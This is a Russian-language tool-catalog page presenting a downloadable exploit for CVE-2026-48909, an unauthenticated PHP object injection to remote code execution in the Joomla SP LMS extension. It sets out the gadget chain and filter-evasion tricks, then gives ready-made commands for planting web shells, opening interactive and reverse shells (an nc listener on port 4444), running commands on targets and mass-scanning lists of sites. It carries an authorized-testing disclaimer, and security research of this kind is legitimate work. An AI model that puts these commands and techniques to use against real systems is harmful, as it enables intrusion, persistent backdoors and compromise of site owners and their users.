Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-48909-Joomla-SP-Exploit — CVE-2026-48909 — Эксплойт неаутентифицированной инъекции PHP-объектов до RCE для расширения Joomla SP LMS версий <= 4.1.3. Использует десериализацию cookie lmsOrders для записи веб-шелла через цепочку гаджетов Joomla FormattedtextLogger. Включает интерактивную оболочку, обнаружение путей и очистку. Только для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/cve-2026-48909-joomla-sp-exploit
Анализ уязвимостейАнализ КодаЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed Teaming
Разработка Полезной Нагрузки
Лаборатории и Практика
GitHubcerberusmrxi/cve-2026-48909-joomla-sp-exploit

CVE-2026-48909-Joomla-SP-Exploit

Репозиторий
2152 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2026-48909 — Эксплойт неаутентифицированной инъекции PHP-объектов до RCE для расширения Joomla SP LMS версий <= 4.1.3. Использует десериализацию cookie lmsOrders для записи веб-шелла через цепочку гаджетов Joomla FormattedtextLogger. Включает интерактивную оболочку, обнаружение путей и очистку. Только для авторизованного тестирования безопасности.

Поделиться

CVE-2026-48909

Joomla SP LMS — Неаутентифицированная PHP-инъекция объектов → Удаленное выполнение кода

Python Version CVSS License Platform

Инструмент для доказательства концепции уязвимости CVE-2026-48909
Автор: Sudeepa Wanigarathna

joomla1

[!IMPORTANT] Только для авторизованного использования. Этот инструмент предназначен для исследований в области безопасности, обучения и тестирования систем, которые принадлежат вам или на которые у вас есть явное письменное разрешение. Несанкционированный доступ к компьютерным системам незаконен. Автор не несет ответственности за неправомерное использование.


Содержание

  • Обзор
  • Детали уязвимости
  • Возможности
  • Установка
  • Быстрый старт
  • Руководство по использованию
  • Справочник по аргументам
  • Типы нагрузок
  • Цепочка атаки
  • Примеры вывода
  • Устранение неполадок
  • Структура репозитория
  • История версий
  • Отказ от ответственности
  • Автор

Обзор

CVE-2026-48909 — критическая неаутентифицированная PHP-инъекция объектов в расширении Joomla SP LMS. Данный инструмент реализует полную цепочку атаки, позволяя специалистам по безопасности проверить воздействие в лабораторных или авторизованных средах.

Он охватывает обнаружение, поиск путей, доставку нагрузки, интерактивную постэксплуатацию (если разрешено), массовую оценку и необязательную очистку.


Детали уязвимости

АтрибутЗначение
CVE IDCVE-2026-48909
CVSS9.5 (Критическая)
Вектор атакиСеть — без аутентификации
ВоздействиеУдаленное выполнение кода
Затронутый продуктJoomla SP LMS
Затронутые версии1.0.0 – 4.1.3
Исправленная версияSP LMS 4.1.4+
Цепочка гаджетовТребуется Joomla < 5.2.2

Матрица совместимости

КомпонентВерсияRCE
SP LMS< 4.1.4Уязвим
SP LMS≥ 4.1.4Исправлен
Joomla< 5.2.2Цепочка гаджетов работоспособна
Joomla≥ 5.2.2Цепочка гаджетов исправлена

Возможности

Основные

ВозможностьОписание
Неаутентифицированная эксплуатацияУчетные данные не требуются
Множество нагрузок7 вариантов веб-шеллов / исполнения
Интерактивная оболочкаСессия с историей команд после развертывания
Поиск путиАвтоматический поиск путей для записи
ОчисткаУдаление развернутого веб-шелла после тестов

Оценка и эксплуатация

ВозможностьОписание
Массовое сканированиеМногопоточный список целей (1000+)
Поддержка проксиHTTP/SOCKS (Burp, ZAP и др.)
Реверс-шеллНагрузки с прослушивателем
Скрытый режимКаналы команд через заголовки / POST
РандомизацияUUID-имена шеллов, ротация User-Agent
ОтчетностьЭкспорт в JSON, HTML или CSV
Помощь в обнаруженииПроверка версий Joomla, --check-only, --safe-mode

Примечания по обходу защиты

  • По возможности избегает символов, блокируемых фильтром cmd в Joomla
  • Шестнадцатеричное кодирование пути записи PHP для уменьшения проблем с base64-заполнением / слешами
  • Настраиваемые задержки и ротация User-Agent
  • Логика повторных попыток для нескольких кандидатов на инъекцию / путь

Установка

Предварительные требования

  • Python 3.6+
  • pip
  • Сетевая доступность до целевой(ых) системы(м) в рамках тестирования

Настройка

cd exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 "CVE-2026-48909 v3.0.py" --help

Зависимости

requests>=2.31.0
urllib3>=2.0.0

argparse поставляется со стандартной библиотекой Python; устанавливать его через pip не требуется.


Быстрый старт

Замените https://target.example на лабораторную или авторизованную цель.

Одна цель — поиск пути + интерактивная оболочка

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Безопасные проверки (без эксплуатации)

python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

Массовое сканирование

python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html

Реверс-шелл (авторизованная лаборатория)

# Прослушиватель
nc -lvnp 4444

# Цель эксплуатации
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path \
  --shell-type reverse \
  --reverse-host 192.168.1.100 \
  --reverse-port 4444

Руководство по использованию

Поиск пути

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path

Известный путь для записи

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php

Интерактивная сессия

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Однократная команда

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

Скрытая нагрузка + интерактив

python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive

Прокси (Burp / ZAP)

python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path --interactive \
  --proxy http://127.0.0.1:8080 \
  --insecure

Очистка

python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php

Формат списка целей

https://lab-a.example
https://lab-b.example
https://lab-c.example
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json

Справочник по аргументам

Цель

АргументОписание
targetURL одной цели
--targets, -T FILEФайл со списком целей (по одному URL на строку)
--path PATHАбсолютный серверный путь для веб-шелла
--shell-type TYPEminimal, standard, stealth, base64, full, reverse, blindshell
--shell-name NAMEИмя файла веб-шелла (по умолчанию: x.php)

Сеть

АргументОписание
--timeout SECONDSТайм-аут запроса (по умолчанию: 15)
--insecureПропустить проверку TLS-сертификата
--proxy URLНапример, http://127.0.0.1:8080
--random-uaРотация User-Agent (включено по умолчанию)
--delay SECONDSЗадержка между запросами

Реверс-шелл

АргументОписание
--reverse-host HOSTХост прослушивателя
--reverse-port PORTПорт прослушивателя

Режимы

АргументОписание
--interactive, -iИнтерактивная оболочка после развертывания
--check-onlyТолько проверка уязвимости
--safe-modeНеразрушающее тестирование
--find-pathАвтоматическое обнаружение пути для записи
--cmd COMMANDВыполнить одну команду и завершить работу
--cleanup PATHУдалить веб-шелл по указанному пути
--cleanup-afterОчистка после эксплуатации
Скачать инструмент